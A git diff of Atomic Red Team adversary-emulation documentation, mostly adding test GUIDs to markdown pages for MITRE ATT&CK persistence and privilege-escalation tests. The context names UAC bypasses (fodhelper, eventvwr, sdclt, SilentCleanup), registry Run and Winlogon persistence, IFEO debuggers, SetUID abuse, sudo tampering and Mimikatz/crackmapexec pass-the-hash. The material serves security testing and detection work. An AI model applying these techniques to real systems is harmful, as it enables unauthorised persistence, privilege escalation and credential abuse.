-if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1}
+if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md
index d04659d0..6b734da2 100644
--- a/atomics/T1546.011/T1546.011.md
+++ b/atomics/T1546.011/T1546.011.md
@@ -30,19 +30,21 @@ Utilizing these shims may allow an adversary to perform several malicious acts s
## Atomic Test #1 - Application Shim Installation + +auto_generated_guid: 9ab27e22-ee62-4211-962b-d36d9a0e6a18 + Install a shim database. This technique is used for privilege escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete." will be displayed. To verify the shim behavior, run the AtomicTest.exe from the \\T1546.011\\bin directory. You should see a message box appear with "Atomic Shim DLL Test!" as defined in the AtomicTest.dll. To better understand what is happening, review the source code files is the \\T1546.011\\src directory. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path to the shim database file | String | PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb| @@ -65,7 +67,7 @@ sdbinst.exe -u #{file_path} >nul 2>&1 ##### Description: Shim database file must exist on disk at specified location (#{file_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_path}) {exit 0} else {exit 1} +if (Test-Path #{file_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -76,7 +78,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato ##### Description: AtomicTest.dll must exist at c:\Tools\AtomicTest.dll ##### Check Prereq Commands: ```powershell -if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} +if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -91,10 +93,12 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - New shim database files created in the default shim database directory + +auto_generated_guid: aefd6866-d753-431f-a7a4-215ca7e3f13d + Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - **Supported Platforms:** Windows @@ -123,11 +127,13 @@ Remove-Item C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb -Err
## Atomic Test #3 - Registry key creation and/or modification events for SDB + +auto_generated_guid: 9b6a06f9-ab5e-4e8d-8289-1df4289db02f + Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing the registry keys that were created. These keys can also be viewed using the Registry Editor. https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - **Supported Platforms:** Windows diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md index 0387c735..fb65e2d6 100644 --- a/atomics/T1546.012/T1546.012.md +++ b/atomics/T1546.012/T1546.012.md @@ -22,15 +22,17 @@ Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniqu
## Atomic Test #1 - IFEO Add Debugger -Leverage Global Flags Settings +auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 + +Leverage Global Flags Settings **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_binary | Binary To Attach To | Path | C:\Windows\System32\calc.exe| | payload_binary | Binary To Execute | Path | C:\Windows\System32\cmd.exe| @@ -56,15 +58,17 @@ reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Imag
## Atomic Test #2 - IFEO Global Flags -Leverage Global Flags Settings +auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 + +Leverage Global Flags Settings **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_binary | Binary To Attach To | Path | C:\Windows\System32\notepad.exe| | payload_binary | Binary To Execute | Path | C:\Windows\System32\cmd.exe| diff --git a/atomics/T1546.013/T1546.013.md b/atomics/T1546.013/T1546.013.md index ddd23f09..f3f31982 100644 --- a/atomics/T1546.013/T1546.013.md +++ b/atomics/T1546.013/T1546.013.md @@ -16,15 +16,17 @@ An adversary may also be able to escalate privileges if a script in a PowerShell
## Atomic Test #1 - Append malicious start-process cmdlet -Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. +auto_generated_guid: 090e5aa5-32b6-473b-a49b-21e843a56896 + +Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | exe_path | Path the malicious executable | Path | calc.exe| | ps_profile | Powershell profile to use | String | $profile| @@ -51,7 +53,7 @@ Set-Content $profile -Value $oldprofile ##### Description: Ensure a powershell profile exists for the current user ##### Check Prereq Commands: ```powershell -if (Test-Path #{ps_profile}) {exit 0} else {exit 1} +if (Test-Path #{ps_profile}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1546.014/T1546.014.md b/atomics/T1546.014/T1546.014.md index 1e5dbb49..1c3eea1b 100644 --- a/atomics/T1546.014/T1546.014.md +++ b/atomics/T1546.014/T1546.014.md @@ -14,15 +14,17 @@ Adversaries may abuse this service by writing a rule to execute commands when a
## Atomic Test #1 - Persistance with Event Monitor - emond -Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 +auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 + +Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | plist | Path to attacker emond plist file | path | PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist| diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 3df5043a..7e20060b 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -60,17 +60,19 @@ Adversaries can use these configuration locations to execute malware, such as re
## Atomic Test #1 - Reg Key Run + +auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05 + Run Key Persistence Upon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe| @@ -95,17 +97,19 @@ REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red T
## Atomic Test #2 - Reg Key RunOnce + +auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb + RunOnce Key Persistence. Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll| @@ -130,16 +134,18 @@ REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
## Atomic Test #3 - PowerShell Registry RunOnce + +auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42 + RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | powershell.exe| | reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce| @@ -166,10 +172,12 @@ Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ig
## Atomic Test #4 - Suspicious vbs file run from startup Folder + +auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 + vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. - **Supported Platforms:** Windows @@ -200,11 +208,13 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbssta
## Atomic Test #5 - Suspicious jse file run from startup Folder + +auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06 + jse files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. - **Supported Platforms:** Windows @@ -235,10 +245,12 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsesta
## Atomic Test #6 - Suspicious bat file run from startup Folder + +auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e + bat files can be placed in and executed from the startup folder to maintain persistance. Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" folder and will also run when the computer is restarted and the user logs in. - **Supported Platforms:** Windows @@ -269,8 +281,10 @@ Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batsta
## Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder -Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. +auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d + +Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. **Supported Platforms:** Windows diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md index 5fe2f423..a360c823 100644 --- a/atomics/T1547.004/T1547.004.md +++ b/atomics/T1547.004/T1547.004.md @@ -22,17 +22,19 @@ Adversaries may take advantage of these features to repeatedly execute malicious
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell + +auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 + PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| @@ -57,17 +59,19 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell + +auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb + PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| @@ -92,17 +96,19 @@ Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Wi
## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell + +auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 + PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll| diff --git a/atomics/T1547.005/T1547.005.md b/atomics/T1547.005/T1547.005.md index 3b89b849..f067e1e4 100644 --- a/atomics/T1547.005/T1547.005.md +++ b/atomics/T1547.005/T1547.005.md @@ -12,15 +12,17 @@ The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentC
## Atomic Test #1 - Modify SSP configuration in registry -Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. +auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e + +Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp| diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md index cff18b2b..94c10ffe 100644 --- a/atomics/T1547.006/T1547.006.md +++ b/atomics/T1547.006/T1547.006.md @@ -16,15 +16,17 @@ Adversaries can use LKMs and kexts to covertly persist on a system and elevate p
## Atomic Test #1 - Linux - Load Kernel Module via insmod -This test uses the insmod command to load a kernel module for Linux. +auto_generated_guid: 687dcb93-9656-4853-9c36-9977315e9d23 + +This test uses the insmod command to load a kernel module for Linux. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | module_name | Name of the kernel module name. | string | T1547006| | module_path | Folder used to store the module. | path | /tmp/T1547.006/T1547006.ko| @@ -51,7 +53,7 @@ sudo rmmod #{module_name} ##### Description: The kernel module must exist on disk at specified location ##### Check Prereq Commands: ```bash -if [ -f #{module_path} ]; then exit 0; else exit 1; fi; +if [ -f #{module_path} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1547.007/T1547.007.md b/atomics/T1547.007/T1547.007.md index 42a377fa..ef96fb9a 100644 --- a/atomics/T1547.007/T1547.007.md +++ b/atomics/T1547.007/T1547.007.md @@ -14,10 +14,12 @@ An adversary can modify one of these files directly to include a link to their m
## Atomic Test #1 - Re-Opened Applications + +auto_generated_guid: 5fefd767-ef54-4ac6-84d3-751ab85e8aba + Plist Method [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - **Supported Platforms:** macOS @@ -42,17 +44,19 @@ or
## Atomic Test #2 - Re-Opened Applications + +auto_generated_guid: 5f5b71da-e03f-42e7-ac98-d63f9e0465cb + Mac Defaults [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script | path to script | path | /path/to/script| diff --git a/atomics/T1547.009/T1547.009.md b/atomics/T1547.009/T1547.009.md index c2f26034..c36f9fe2 100644 --- a/atomics/T1547.009/T1547.009.md +++ b/atomics/T1547.009/T1547.009.md @@ -14,17 +14,19 @@ Adversaries could use shortcuts to execute their tools for persistence. They may
## Atomic Test #1 - Shortcut Modification + +auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce + This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. Upon execution, calc.exe will be launched. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | shortcut_file_path | shortcut modified and execute | path | %temp%\T1547.009_modified_shortcut.url| @@ -51,9 +53,11 @@ del -f #{shortcut_file_path} >nul 2>&1
## Atomic Test #2 - Create shortcut to cmd in startup folders + +auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 + LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" to view the new shortcut. - **Supported Platforms:** Windows diff --git a/atomics/T1547.010/T1547.010.md b/atomics/T1547.010/T1547.010.md index 60ed62c2..db194c9d 100644 --- a/atomics/T1547.010/T1547.010.md +++ b/atomics/T1547.010/T1547.010.md @@ -19,15 +19,17 @@ Adversaries can use this technique to load malicious code at startup that will p
## Atomic Test #1 - Add Port Monitor persistence in Registry -Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. +auto_generated_guid: d34ef297-f178-4462-871e-9ce618d44e50 + +Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot dll will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | monitor_dll | Addition to port monitor registry key. Normally refers to a DLL name in C:\Windows\System32. arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL. | Path | C:\Path\AtomicRedTeam.dll| diff --git a/atomics/T1547.011/T1547.011.md b/atomics/T1547.011/T1547.011.md index e18c5b40..1056a105 100644 --- a/atomics/T1547.011/T1547.011.md +++ b/atomics/T1547.011/T1547.011.md @@ -14,8 +14,10 @@ A specific plist used for execution at login is com.apple.loginitems.plist
## Atomic Test #1 - Plist Modification -Modify MacOS plist file in one of two directories +auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 + +Modify MacOS plist file in one of two directories **Supported Platforms:** macOS diff --git a/atomics/T1548.001/T1548.001.md b/atomics/T1548.001/T1548.001.md index 5cee87b3..79887ecd 100644 --- a/atomics/T1548.001/T1548.001.md +++ b/atomics/T1548.001/T1548.001.md @@ -18,15 +18,17 @@ Adversaries can use this mechanism on their own malware to make sure they're abl
## Atomic Test #1 - Make and modify binary from C source -Make, change owner, and change file attributes on a C source code file +auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 + +Make, change owner, and change file attributes on a C source code file **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | payload | hello.c payload | path | PathToAtomicsFolder/T1548.001/src/hello.c| @@ -57,15 +59,17 @@ sudo rm /tmp/hello.c
## Atomic Test #2 - Set a SetUID flag on file -This test sets the SetUID flag on a file in Linux and macOS. +auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 + +This test sets the SetUID flag on a file in Linux and macOS. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_setuid | Path of file to set SetUID flag | path | /tmp/evilBinary| @@ -92,15 +96,17 @@ sudo rm #{file_to_setuid}
## Atomic Test #3 - Set a SetGID flag on file -This test sets the SetGID flag on a file in Linux and macOS. +auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c + +This test sets the SetGID flag on a file in Linux and macOS. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_setuid | Path of file to set SetGID flag | path | /tmp/evilBinary| diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md index 597dc756..1d8250bc 100644 --- a/atomics/T1548.002/T1548.002.md +++ b/atomics/T1548.002/T1548.002.md @@ -34,16 +34,18 @@ Another bypass is possible through some lateral movement techniques if credentia
## Atomic Test #1 - Bypass UAC using Event Viewer (cmd) + +auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 + Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -69,16 +71,18 @@ reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
## Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell) + +auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b + PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ Upon execution command prompt should be launched with administrative privelages - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -105,16 +109,18 @@ Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
## Atomic Test #3 - Bypass UAC using Fodhelper + +auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 + Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -141,16 +147,18 @@ reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell + +auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa + PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution command prompt will be opened. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -178,16 +186,18 @@ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ig
## Atomic Test #5 - Bypass UAC using ComputerDefaults (PowerShell) + +auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f + PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 Upon execution administrative command prompt should open - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -215,16 +225,18 @@ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ig
## Atomic Test #6 - Bypass UAC by Mocking Trusted Directories + +auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1 + Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| @@ -252,18 +264,20 @@ del "c:\testbypass.exe" >nul 2>nul
## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute + +auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 + Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command.to.execute | Command to execute | string | cmd.exe /c notepad.exe| @@ -291,9 +305,11 @@ Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction I
## Atomic Test #8 - Disable UAC using reg.exe + +auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 - **Supported Platforms:** Windows @@ -320,6 +336,9 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En
## Atomic Test #9 - Bypass UAC using SilentCleanup task + +auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 + Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). @@ -331,14 +350,13 @@ And forcefully run SilentCleanup task: schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat| diff --git a/atomics/T1548.003/T1548.003.md b/atomics/T1548.003/T1548.003.md index dc2d0842..6188a9e6 100644 --- a/atomics/T1548.003/T1548.003.md +++ b/atomics/T1548.003/T1548.003.md @@ -22,8 +22,10 @@ In the wild, malware has disabled tty_tickets to potentially make s
## Atomic Test #1 - Sudo usage -Common Sudo enumeration methods. +auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e + +Common Sudo enumeration methods. **Supported Platforms:** macOS, Linux @@ -48,8 +50,10 @@ sudo vim /etc/sudoers
## Atomic Test #2 - Unlimited sudo cache timeout -Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. +auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc + +Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. **Supported Platforms:** macOS, Linux @@ -73,8 +77,10 @@ sudo visudo -c -f /etc/sudoers
## Atomic Test #3 - Disable tty_tickets for sudo caching -Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. +auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 + +Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. **Supported Platforms:** macOS, Linux diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index 3b5dc5f3..1c8d7ebe 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -16,16 +16,18 @@ Adversaries may also use stolen password hashes to "overpass the hash." Similar
## Atomic Test #1 - Mimikatz Pass the Hash + +auto_generated_guid: ec23cef9-27d9-46e4-a68d-6f75f7b86908 + Note: must dump hashes first [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| | ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a| @@ -48,7 +50,7 @@ Note: must dump hashes first ##### Check Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} -if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -66,15 +68,17 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
## Atomic Test #2 - crackmapexec Pass the Hash -command execute with crackmapexec +auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 + +command execute with crackmapexec **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username | string | Administrator| | crackmapexec_exe | crackmapexec windows executable | Path | C:\CrackMapExecWin\crackmapexec.exe| @@ -97,7 +101,7 @@ crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} ##### Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) ##### Check Prereq Commands: ```powershell -if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } +if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md index 8c4fc94d..4b9d9a7b 100644 --- a/atomics/T1550.003/T1550.003.md +++ b/atomics/T1550.003/T1550.003.md @@ -18,15 +18,17 @@ Adversaries may also create a valid Kerberos ticket using other user information
